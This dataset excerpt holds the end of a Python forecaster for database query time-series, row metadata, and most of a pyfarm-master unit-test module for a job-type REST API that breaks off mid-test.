self._cluster_data = []
for cluster in self._clusters:
# Aggregated time-series from the cluster
data = cluster.get_timeseries()
train_raw_data, test_raw_data = self._split_data(data)
self._cluster_data.append((train_raw_data, test_raw_data))
def _split_data(self, data: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
"""
Split the raw data into a training set, and a testing(evaluation) set.
:param data: All the raw data
        :return: training, test raw data sets
"""
if self._test_mode:
self._test_set_size = len(data)
else:
self._test_set_size = self._eval_data_size
if self._test_set_size > len(data):
raise ValueError(
"Eval data size is too small. Not enough data points.")
split_idx = len(data) - self._test_set_size
# First part as the training set
train_raw_data = data[:split_idx]
# Last part as the testing set
test_raw_data = data[split_idx:]
return train_raw_data, test_raw_data
def _make_seqs(self,
input_data: np.ndarray,
start: int,
end: int,
with_label: bool = False) -> List[Union[Tuple[np.ndarray,
np.ndarray],
np.ndarray]]:
"""
Create time-series sequences of fixed sequence length from a continuous range of time-series.
:param input_data: Input time-series
:param start: Start index (inclusive) of the first sequence to be made
:param end: End index (exclusive) of the last sequence to be made
:param with_label: True if label in a certain horizon is added
:return: Sequences of fixed length if with_label is False,
or List of fixed length sequence and label if with_label is True
"""
seq_len = self._seq_len
horizon = self._horizon_len
seq_start = start
if with_label:
# Reserve space for horizon
seq_end = end - seq_len - horizon
else:
# Use all data for prediction
seq_end = end - seq_len
if seq_end <= seq_start:
raise IndexError(f"Not enough data points to make sequences")
seqs = []
for i in range(seq_start, seq_end):
seq = input_data[i:i + seq_len].reshape(-1, 1)
# Look beyond the horizon to get the label
if with_label:
label_i = i + seq_len + horizon
label = input_data[label_i: label_i + 1].reshape(1, -1)
seqs.append((seq, label))
else:
seqs.append(seq)
return seqs
@lru_cache(maxsize=32)
def _cluster_seqs(self,
cluster_id: int,
test_mode: bool = False,
with_label: bool = False) -> List[Union[Tuple[np.ndarray,
np.ndarray],
np.ndarray]]:
"""
Create time-series sequences of fixed sequence length from a continuous range of time-series. A cached wrapper
over _make_seqs with different options.
:param cluster_id: Cluster id
:param test_mode: True if using test dataset, otherwise use the training dataset
:param with_label: True if label (time-series data in a horizon from the sequence) is also added.
:return: Sequences of fixed length if with_label is False,
or List of fixed length sequence and label if with_label is True
"""
if test_mode:
input_data = self._cluster_data[cluster_id][self.TEST_DATA_IDX]
else:
input_data = self._cluster_data[cluster_id][self.TRAIN_DATA_IDX]
seqs = self._make_seqs(
input_data,
0,
len(input_data),
with_label=with_label)
return seqs
def train(self, models_kwargs: Dict) -> List[List[ForecastModel]]:
"""
:param models_kwargs: A dictionary of models' init arguments
:return: List of models(a list of models) for each cluster.
"""
models = []
for cid in range(len(self._cluster_data)):
cluster_models = get_models(models_kwargs)
train_seqs = self._cluster_seqs(
cid, test_mode=False, with_label=True)
for model_name, model in cluster_models.items():
# Fit the model
model.fit(train_seqs)
self.eval(cid, model)
models.append(cluster_models)
return models
def eval(self, cid: int, model: ForecastModel) -> None:
"""
Evaluate a fitted model on the test dataset.
:param cid: Cluster id
:param model: Model to use
"""
eval_seqs = self._cluster_seqs(cid, test_mode=True, with_label=True)
preds = []
gts = []
for seq, label in eval_seqs:
pred = model.predict(seq)
preds.append(pred)
gts.append(label.item())
# FIXME:
# simple L2 norm for comparing the prediction and results
l2norm = np.linalg.norm(np.array(preds) - np.array(gts))
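# Note: this is the aggregate L2 norm over the entire test set; dividing by
# sqrt(len(preds)) would yield the RMSE if a size-normalized metric is wanted.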
LOG.info(
f"[{model.name}] has L2 norm(prediction, ground truth) = {l2norm}")
def predict(self, cid: int, model: ForecastModel) -> Dict:
"""
Output prediction on the test dataset, and segregate the predicted cluster time-series into individual queries
:param cid: Cluster id
:param model: Model to use
:return: Dict of {query_id -> time-series}
"""
test_seqs = self._cluster_seqs(cid, test_mode=True, with_label=False)
preds = [model.predict(seq) for seq in test_seqs]
query_preds = self._clusters[cid].segregate(preds)
return query_preds
def parse_model_config(model_names: Optional[List[str]],
models_config: Optional[str]) -> Dict:
"""
Build the keyword-argument dictionary for each requested model, merging in any JSON config file.
:param model_names: List of model names
:param models_config: JSON model config file
:return: Merged model config Dict
"""
model_kwargs = {model_name: {} for model_name in (model_names or [])}
if models_config is not None:
with open(models_config, 'r') as f:
custom_config = json.load(f)
# Simple and non-recursive merging of options
model_kwargs.update(custom_config)
if len(model_kwargs) < 1:
raise ValueError("At least 1 model needs to be used.")
return model_kwargs
if __name__ == "__main__":
args = argp.parse_args()
if args.test_file is None:
# Parse models arguments
models_kwargs = parse_model_config(args.models, args.models_config)
# Generate OLTP trace file
if args.gen_data:
gen_oltp_trace(
tpcc_weight=args.tpcc_weight,
tpcc_rates=args.tpcc_rates,
pattern_iter=args.pattern_iter)
trace_file = DEFAULT_QUERY_TRACE_FILE
else:
trace_file = args.trace_file
forecaster = Forecaster(
trace_file=trace_file,
interval_us=INTERVAL_MICRO_SEC,
seq_len=args.seq_len,
eval_size=args.eval_size,
horizon_len=args.horizon_len)
models = forecaster.train(models_kwargs)
# Save the model
if args.model_save_path:
with open(args.model_save_path, "wb") as f:
pickle.dump(models, f)
else:
# Do inference on a trained model
with open(args.model_load_path, "rb") as f:
models = pickle.load(f)
forecaster = Forecaster(
trace_file=args.test_file,
test_mode=True,
interval_us=INTERVAL_MICRO_SEC,
seq_len=args.seq_len,
eval_size=args.eval_size,
horizon_len=args.horizon_len)
# FIXME:
# Assuming all the queries in the current trace file are from
# the same cluster for now
query_pred = forecaster.predict(0, models[0][args.test_model])
# TODO:
# How are we consuming predictions?
for qid, ts in query_pred.items():
LOG.info(f"[Query: {qid}] pred={ts[:10]}")
| 36.145408
| 118
| 0.619239
| 7,744
| 0.546545
| 0
| 0
| 1,290
| 0.091044
| 0
| 0
| 5,572
| 0.393253
|
4231a5537ad061f7ccafef21420ba06d2605d9cf
| 66,059
|
py
|
Python
|
tests/test_master/test_jobtypes_api.py
|
guidow/pyfarm-master
|
d41c8f1eb5bfefb8400d400bcecadf197bcfb80a
|
[
"Apache-2.0"
] | null | null | null |
tests/test_master/test_jobtypes_api.py
|
guidow/pyfarm-master
|
d41c8f1eb5bfefb8400d400bcecadf197bcfb80a
|
[
"Apache-2.0"
] | null | null | null |
tests/test_master/test_jobtypes_api.py
|
guidow/pyfarm-master
|
d41c8f1eb5bfefb8400d400bcecadf197bcfb80a
|
[
"Apache-2.0"
] | null | null | null |
# No shebang line, this module is meant to be imported
#
# Copyright 2013 Oliver Palmer
# Copyright 2014 Ambient Entertainment GmbH & Co. KG
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from json import dumps
# test class must be loaded first
from pyfarm.master.testutil import BaseTestCase
BaseTestCase.build_environment()
from pyfarm.master.application import get_api_blueprint
from pyfarm.master.entrypoints import load_api
from pyfarm.models.jobtype import JobType, JobTypeVersion
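# Job type source uploaded by the tests below; the API stores it verbatim and
# returns it unchanged from the .../versions/<n>/code endpoint.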
code = """from pyfarm.jobtypes.core.jobtype import JobType
class TestJobType(JobType):
def get_command(self):
return "/usr/bin/touch"
def get_arguments(self):
return [os.path.join(
self.assignment_data["job"]["data"]["path"],
"%04d" % self.assignment_data[\"tasks\"][0][\"frame\"])]
"""
class TestJobTypeAPI(BaseTestCase):
def setup_app(self):
super(TestJobTypeAPI, self).setup_app()
self.api = get_api_blueprint()
self.app.register_blueprint(self.api)
load_api(self.app, self.api)
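# The registered blueprint serves the /api/v1/... endpoints exercised below.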
def test_jobtype_schema(self):
response = self.client.get("/api/v1/jobtypes/schema")
self.assert_ok(response)
schema = JobType.to_schema()
schema.update(JobTypeVersion.to_schema())
self.assertEqual(response.json, schema)
def test_jobtype_post(self):
response1 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_ok(response2)
self.assertEqual(
response2.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
response3 = self.client.get("/api/v1/jobtypes/%s" % id)
self.assert_ok(response3)
self.assertEqual(
response3.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_post_empty_max_batch(self):
response1 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": None,
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_ok(response2)
self.assertEqual(
response2.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": None,
"name": "TestJobType",
"software_requirements": [],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_post_with_requirements(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
software_id = response1.json['id']
software_min_version_id = response1.json["versions"][0]["id"]
software_max_version_id = response1.json["versions"][1]["id"]
response2 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
}]
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_ok(response3)
self.assertEqual(
response3.json, {
"batch_contiguous": True,
"classname": None,
"no_automatic_start_time": False,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [{
'max_version': '1.1',
'max_version_id': software_max_version_id,
'min_version': '1.0',
'min_version_id': software_min_version_id,
'software': 'foo',
'software_id': software_id
}],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_post_with_bad_requirements(self):
response1 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [{
"hardware": "bar"
}]
}))
self.assert_bad_request(response1)
response2 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [{
"software": "unknown_software"
}]
}))
self.assert_not_found(response2)
def test_jobtype_post_conflict(self):
response1 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
response2 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_conflict(response2)
def test_jobtypes_list(self):
response1 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.get("/api/v1/jobtypes/")
self.assert_ok(response2)
self.assertEqual(
response2.json, [
{
"id": id,
"name": "TestJobType"
}
])
def test_jobtype_post_with_no_name(self):
response1 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"description": "Jobtype for testing inserts and queries",
"code": code
}))
self.assert_bad_request(response1)
def test_jobtype_post_with_no_code(self):
response1 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries"
}))
self.assert_bad_request(response1)
def test_jobtype_post_with_additional_keys(self):
response1 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"code": code,
"unknown_key": 42
}))
self.assert_bad_request(response1)
def test_jobtype_get_unknown(self):
response1 = self.client.get("/api/v1/jobtypes/unknown_jobtype")
self.assert_not_found(response1)
def test_jobtype_put(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_ok(response2)
self.assertEqual(
response2.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_put_overwrite(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.put(
"/api/v1/jobtypes/%s" % id,
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing (updated)",
"max_batch": 1,
"code": code
}))
self.assert_created(response2)
response3 = self.client.get("/api/v1/jobtypes/%s" % id)
self.assert_ok(response3)
self.assertEqual(
response3.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing (updated)",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [],
"version": 2,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_put_unknown_keys(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"unknown_key": 42
}))
self.assert_bad_request(response1)
def test_jobtype_put_with_no_name(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"unknown_key": 42
}))
self.assert_bad_request(response1)
def test_jobtype_put_with_requirements(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
software_id = response1.json['id']
software_min_version_id = response1.json["versions"][0]["id"]
software_max_version_id = response1.json["versions"][1]["id"]
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
}
]
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_ok(response3)
self.assertEqual(
response3.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [
{
'max_version': '1.1',
'max_version_id': software_max_version_id,
'min_version': '1.0',
'min_version_id': software_min_version_id,
'software': 'foo',
'software_id': software_id
}
],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_put_with_requirements_not_list(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": 42
}))
self.assert_bad_request(response1)
def test_jobtype_put_with_requirement_not_dict(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [42]
}))
self.assert_bad_request(response1)
def test_jobtype_put_with_requirement_unknown_software(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
}
]
}))
self.assert_not_found(response1)
def test_jobtype_put_with_requirements_unknown_sw_version(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo"
}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.1"
}
]
}))
self.assert_not_found(response2)
response3 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"max_version": "1.1"
}
]
}))
self.assert_not_found(response3)
def test_jobtype_put_with_requirements_unknown_keys(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo"
}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"unknown_key": 42
}
]
}))
self.assert_bad_request(response2)
def test_jobtype_put_with_requirements_missing_keys(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{}
]
}))
self.assert_bad_request(response1)
def test_jobtype_put_retain_requirements(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
software_id = response1.json['id']
software_min_version_id = response1.json["versions"][0]["id"]
software_max_version_id = response1.json["versions"][1]["id"]
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
}
]
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing (updated)",
"max_batch": 1,
"code": code
}))
self.assert_created(response3)
response4 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_ok(response4)
self.assertEqual(
response4.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing (updated)",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [
{
'max_version': '1.1',
'max_version_id': software_max_version_id,
'min_version': '1.0',
'min_version_id': software_min_version_id,
'software': 'foo',
'software_id': software_id
}
],
"version": 2,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_delete(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
}
]
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.delete("/api/v1/jobtypes/TestJobType")
self.assert_no_content(response3)
response4 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_not_found(response4)
response5 = self.client.get("/api/v1/jobtypes/%s" % id)
self.assert_not_found(response5)
def test_jobtype_delete_by_id(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
}
]
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.delete("/api/v1/jobtypes/%s" % id)
self.assert_no_content(response3)
response4 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_not_found(response4)
response5 = self.client.get("/api/v1/jobtypes/%s" % id)
self.assert_not_found(response5)
def test_jobtype_list_versions(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.put(
"/api/v1/jobtypes/%s" % id,
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing (updated)",
"max_batch": 1,
"code": code
}))
self.assert_created(response2)
response3 = self.client.get("/api/v1/jobtypes/TestJobType/versions/")
self.assert_ok(response3)
self.assertEqual(response3.json, [1, 2])
response4 = self.client.get("/api/v1/jobtypes/%s/versions/" % id)
self.assert_ok(response4)
self.assertEqual(response4.json, [1, 2])
def test_jobtype_list_versions_unknown_jobtype(self):
response1 = self.client.get("/api/v1/jobtypes/UnknownJobType/versions/")
self.assert_not_found(response1)
def test_jobtype_get_versioned(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": []
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 2,
"code": code,
"software_requirements": []
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.get("/api/v1/jobtypes/TestJobType/versions/1")
self.assert_ok(response3)
self.assertEqual(
response3.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
response4 = self.client.get("/api/v1/jobtypes/%s/versions/1" % id)
self.assert_ok(response4)
self.assertEqual(
response4.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
response5 = self.client.get("/api/v1/jobtypes/%s/versions/2" % id)
self.assert_ok(response5)
self.assertEqual(
response5.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 2,
"name": "TestJobType",
"software_requirements": [],
"version": 2,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_get_unknown_version(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": []
}))
self.assert_created(response1)
response2 = self.client.get("/api/v1/jobtypes/TestJobType/versions/42")
self.assert_not_found(response2)
def test_jobtype_delete_version(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": []
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 2,
"code": code,
"software_requirements": []
}))
self.assert_created(response2)
response3 = self.client.delete("/api/v1/jobtypes/TestJobType/versions/2")
self.assert_no_content(response3)
response4 = self.client.get("/api/v1/jobtypes/TestJobType/versions/2")
self.assert_not_found(response4)
response5 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_ok(response5)
self.assertEqual(
response5.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_by_id_delete_version(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": []
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 2,
"code": code,
"software_requirements": []
}))
self.assert_created(response2)
response3 = self.client.delete("/api/v1/jobtypes/%s/versions/2" % id)
self.assert_no_content(response3)
response4 = self.client.get("/api/v1/jobtypes/TestJobType/versions/2")
self.assert_not_found(response4)
response5 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_ok(response5)
self.assertEqual(
response5.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_get_code(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": []
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.get(
"/api/v1/jobtypes/TestJobType/versions/1/code")
self.assert_ok(response2)
self.assertEqual(response2.data.decode(), code)
response3 = self.client.get(
"/api/v1/jobtypes/%s/versions/1/code" % id)
self.assert_ok(response3)
self.assertEqual(response3.data.decode(), code)
def test_jobtype_get_code_not_found(self):
response1 = self.client.get(
"/api/v1/jobtypes/UnknownJobType/versions/1/code")
self.assert_not_found(response1)
def test_jobtype_list_requirements(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
software_id = response1.json['id']
software_min_version_id = response1.json["versions"][0]["id"]
software_max_version_id = response1.json["versions"][1]["id"]
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
}
]
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/")
self.assert_ok(response3)
self.assertEqual(response3.json, [
{
"software": {
"software": "foo",
"id": software_id
},
"max_version": {
"version": "1.1",
"id": software_max_version_id
},
"min_version": {
"version": "1.0",
"id": software_min_version_id
},
"jobtype_version": {
"version": 1,
"jobtype": "TestJobType",
}
}
])
response4 = self.client.get(
"/api/v1/jobtypes/%s/versions/1/software_requirements/" % id)
self.assert_ok(response4)
self.assertEqual(response4.json, [
{
"software": {
"software": "foo",
"id": software_id
},
"max_version": {
"version": "1.1",
"id": software_max_version_id
},
"min_version": {
"version": "1.0",
"id": software_min_version_id
},
"jobtype_version": {
"version": 1,
"jobtype": "TestJobType",
}
}
])
def test_jobtype_list_requirements_unknown_jobtype(self):
response1 = self.client.get(
"/api/v1/jobtypes/UnknownJobType/software_requirements/")
self.assert_not_found(response1)
def test_jobtype_list_requirements_unknown_version(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.get(
"/api/v1/jobtypes/TestJobType/versions/100/software_requirements/")
self.assert_not_found(response2)
def test_jobtype_post_requirement(self):
response1 = self.client.put(
